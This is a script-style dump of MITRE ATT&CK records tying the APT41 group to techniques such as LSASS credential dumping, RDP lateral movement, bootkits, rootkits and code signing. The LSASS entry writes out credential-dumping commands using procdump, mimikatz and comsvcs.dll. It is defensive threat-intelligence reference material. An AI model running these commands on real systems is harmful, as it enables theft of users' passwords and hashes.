* App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence')]
technique_id : T1546.008
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Process: Process Creation', 'Command: Command Execution', 'File: File Creation', 'File: File Modification', 'Windows Registry: Windows Registry Key Modification']
permissions_required : ['Administrator']
effective_permissions : ['SYSTEM']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has used hashdump, [Mimikatz](https://attack.mitre.org/software/S0002), and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--cbbbc655-e5a7-40e9-be62-7f29727b9f0c
revoked : False
technique : LSASS Memory
technique_description : Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).

As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.

For example, on the target host use procdump:

* <code>procdump -ma lsass.exe lsass_dump</code>

Locally, mimikatz can be run using:

* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>

Built-in Windows tools such as comsvcs.dll can also be used:

* <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID  lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)


Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)

The following SSPs can be used to access credentials:

* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')]
technique_id : T1003.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Process: Process Access', 'Windows Registry: Windows Registry Key Modification', 'Process: Process Creation', 'Process: OS API Execution', 'Logon Session: Logon Session Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used RDP for lateral movement.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--e7bcc9e7-d373-4b1e-a664-886c4fc04bc5
revoked : False
technique : Remote Desktop Protocol
technique_description : Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) 

Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='lateral-movement')]
technique_id : T1021.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Network Traffic: Network Traffic Flow', 'Logon Session: Logon Session Creation', 'Network Traffic: Network Connection Creation', 'Process: Process Creation', 'Logon Session: Logon Session Metadata']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a malware variant called WIDETONE to conduct port scans on specified subnets.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--883558d8-c445-45cf-a5cd-841fdf49f311
revoked : False
technique : Network Service Discovery
technique_description : Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)   

Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.

Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1046
matrix : mitre-attack
platform : ['Windows', 'IaaS', 'Linux', 'macOS', 'Containers', 'Network']
data_sources : ['Network Traffic: Network Traffic Flow', 'Command: Command Execution', 'Cloud Service: Cloud Service Enumeration']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) performed password brute-force attacks on the local admin account.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--79958036-a8bf-4808-af4f-f9f7a9cb6e7c
revoked : False
technique : Password Cracking
technique_description : Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further,  adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A) 

Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')]
technique_id : T1110.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Office 365', 'Azure AD', 'Network']
data_sources : ['User Account: User Account Authentication', 'Application Log: Application Log Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--48132286-7b7d-42cf-956b-95c75eeff1e3
revoked : False
technique : Bootkit
technique_description : Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.

A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)

The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1542.003
matrix : mitre-attack
platform : ['Linux', 'Windows']
data_sources : ['Drive: Drive Modification']
permissions_required : ['Administrator', 'SYSTEM']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) deployed rootkits on Linux systems.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--1be07717-ad08-4364-9a58-b44a95a389a5
revoked : False
technique : Rootkit
technique_description : Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) 

Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1014
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Drive: Drive Modification', 'Firmware: Firmware Modification', 'File: File Modification']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--3213e4e5-c3e4-4d51-8dce-929248f2882b
revoked : False
technique : Code Signing
technique_description : Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.

Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)

Code signing certificates may be used to bypass security policies that require signed code to execute on a system. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1553.002
matrix : mitre-attack
platform : ['macOS', 'Windows']
data_sources : ['File: File Metadata']
----------------------------------------------------------------------------------------------------